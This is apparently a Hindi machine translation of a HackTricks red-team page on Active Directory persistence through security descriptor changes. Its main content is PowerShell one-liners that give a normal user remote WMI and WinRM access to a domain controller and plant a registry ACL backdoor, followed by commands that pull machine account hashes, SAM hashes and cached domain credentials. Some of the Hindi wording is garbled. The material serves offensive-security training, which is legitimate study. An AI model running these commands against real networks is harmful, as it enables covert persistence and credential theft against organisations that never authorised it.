8.4 KiB
सुरक्षा विवरण
जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सदस्यता योजनाएं देखें!
- आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
- शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
- अपने हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
सुरक्षा विवरण
दस्तावेज़ से: सुरक्षा विवरण परिभाषा भाषा (SDDL) उस प्रारूप को परिभाषित करता है जिसका उपयोग सुरक्षा विवरण को वर्णित करने के लिए किया जाता है। SDDL डेकल और SACL के लिए ACE स्ट्रिंग का उपयोग करता है: ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
सुरक्षा विवरण का उपयोग अन्य वस्तुओं पर वस्तु के अधिकार संग्रहित करने के लिए किया जाता है। यदि आप किसी वस्तु के सुरक्षा विवरण में केवल थोड़ा सा परिवर्तन कर सकते हैं, तो आप उस वस्तु पर बहुत दिलचस्प विशेषाधिकार प्राप्त कर सकते हैं जिसके लिए आपको किसी विशेषाधिकृत समूह के सदस्य होने की आवश्यकता नहीं है।
फिर, यह स्थायित्व तकनीक उस क्षमता पर आधारित है कि विशेष वस्तुओं के खिलाफ आवश्यक प्रत्येक विशेषाधिकार जीतने की क्षमता, एक कार्य को करने की क्षमता होनी चाहिए जो सामान्यत: व्यवस्थापक विशेषाधिकारों की आवश्यकता होती है लेकिन व्यवस्थापक होने की आवश्यकता नहीं है।
WMI तक पहुंच
आप एक उपयोगकर्ता को दूरस्थ WMI को क्रियान्वित करने की अनुमति दे सकते हैं इसका उपयोग करके:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
WinRM तक पहुंच
इसका उपयोग करके एक उपयोगकर्ता को winrm PS कंसोल तक पहुंच दें:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
दूरस्थ पहुंच से हैश तक पहुंच
रजिस्ट्री तक पहुंचें और हैश डंप बनाएं, DAMP** का उपयोग करके** रेग बैकडोर बनाएं, ताकि आप किसी भी समय कंप्यूटर के हैश, SAM और कंप्यूटर में किसी भी कैश्ड AD क्रेडेंशियल को पुनः प्राप्त कर सकें। इसलिए, एक सामान्य उपयोगकर्ता को इस अनुमति को दोमेन कंट्रोलर कंप्यूटर के खिलाफ देना बहुत उपयुक्त है:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
जांचें सिल्वर टिकट कैसे आप डोमेन कंट्रोलर के कंप्यूटर अकाउंट के हैश का उपयोग कर सकते हैं।
जानें जीरो से हीरो तक AWS हैकिंग को htARTE (HackTricks AWS Red Team Expert) सीखें!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान जांचें!
- आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
- हमारे विशेष NFTs कलेक्शन, द पीएस फैमिली खोजें
- शामिल हों 💬 डिस्कॉर्ड ग्रुप या टेलीग्राम ग्रुप या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो करें।
- हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।